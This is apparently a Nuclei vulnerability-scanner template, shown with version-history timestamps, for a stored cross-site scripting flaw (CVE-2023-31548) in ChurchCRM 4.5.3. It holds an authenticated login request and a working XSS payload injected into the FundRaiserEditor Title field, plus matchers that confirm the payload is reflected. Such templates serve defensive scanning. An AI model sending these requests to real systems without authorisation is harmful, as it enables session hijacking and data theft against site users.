nuclei-templates/http/cves/2023/CVE-2023-31548.yaml

56 lines
2.3 KiB
YAML
Raw Permalink Normal View History

2023-06-24 20:40:57 +00:00
id: CVE-2023-31548
info:
2023-06-26 05:10:51 +00:00
name: ChurchCRM v4.5.3 - Cross-Site Scripting
2023-06-24 20:40:57 +00:00
author: Harsh
severity: medium
description: |
A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
2023-09-06 11:43:37 +00:00
remediation: |
To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
2023-06-24 20:40:57 +00:00
reference:
- https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-31548
- https://nvd.nist.gov/vuln/detail/CVE-2023-31548
- https://github.com/10splayaSec/CVE-Disclosures
2023-06-24 20:40:57 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2023-31548
cwe-id: CWE-79
2024-05-31 19:23:20 +00:00
epss-score: 0.00089
epss-percentile: 0.37968
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:*
2023-06-24 20:40:57 +00:00
metadata:
verified: true
2023-09-06 11:43:37 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: churchcrm
product: churchcrm
2024-01-14 09:21:50 +00:00
tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated
2023-06-26 05:10:51 +00:00
2023-06-24 20:40:57 +00:00
http:
- raw:
- |
2023-06-26 05:10:51 +00:00
POST /session/begin HTTP/1.1
2023-06-24 20:40:57 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User={{username}}&Password={{password}}
- |
2023-06-26 05:10:51 +00:00
POST /FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1
2023-06-24 20:40:57 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
FundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
2023-06-26 05:10:51 +00:00
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "onfocus=\"alert(document.domain)\" autofocus=\"\"></td>")'
2023-06-24 20:40:57 +00:00
- 'contains(body_2, "ChurchCRM")'
condition: and
# digest: 4b0a00483046022100f7a5e13d5c7dc991bd7a56540690cd04e964d143cb0cb207bafa4b40056f7078022100a0dd45c4c270376c10d96a5ce999d8e6774ad21ce9423a7eb28770710358e9d9:922c64590222798bb761d5b6d8e72950